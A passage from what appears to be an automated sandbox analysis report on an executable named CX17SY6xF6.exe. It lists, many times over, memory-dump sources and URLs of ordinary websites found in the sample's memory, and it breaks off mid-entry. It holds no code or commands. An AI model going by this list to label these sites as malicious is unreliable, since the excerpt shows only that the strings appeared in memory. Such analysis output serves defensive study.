                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/cropped-TeamGo-Green-180x180.png
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/cropped-TeamGo-Green-192x192.png
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/cropped-TeamGo-Green-270x270.png
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/cropped-TeamGo-Green-32x32.png
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/feliwegerDEweb.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/mobileChristianDEfr.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/nandakamrathENundDEweb-1.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/05/Slider0205-1.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/05/Slider0205DEmobile.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-json/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.com-sit.com%2F
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.com-sit.com%2F&#038;format=xm
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-json/wp/v2/pages/46
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/x-ray/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/xmlrpc.php?rsd
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/zertifikate/
                  Source: CX17SY6xF6.exe, 00000000.00000003.648512272.00000000071FB000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.crcsi.org/
                  Source: CX17SY6xF6.exe, 00000000.00000003.581132870.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.697756407.0000000007360000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.credo.edu.pl/
                  Source: CX17SY6xF6.exe, 00000000.00000003.576091404.0000000000E23000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.576091404.0000000000E5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dgmna.com/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.888204578.0000000007217000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.705024068.0000000007460000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.edimart.hu/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/#/schema/logo/image/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/#breadcrumb
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/#organization
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/#primaryimage
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/#website
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/?s=
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 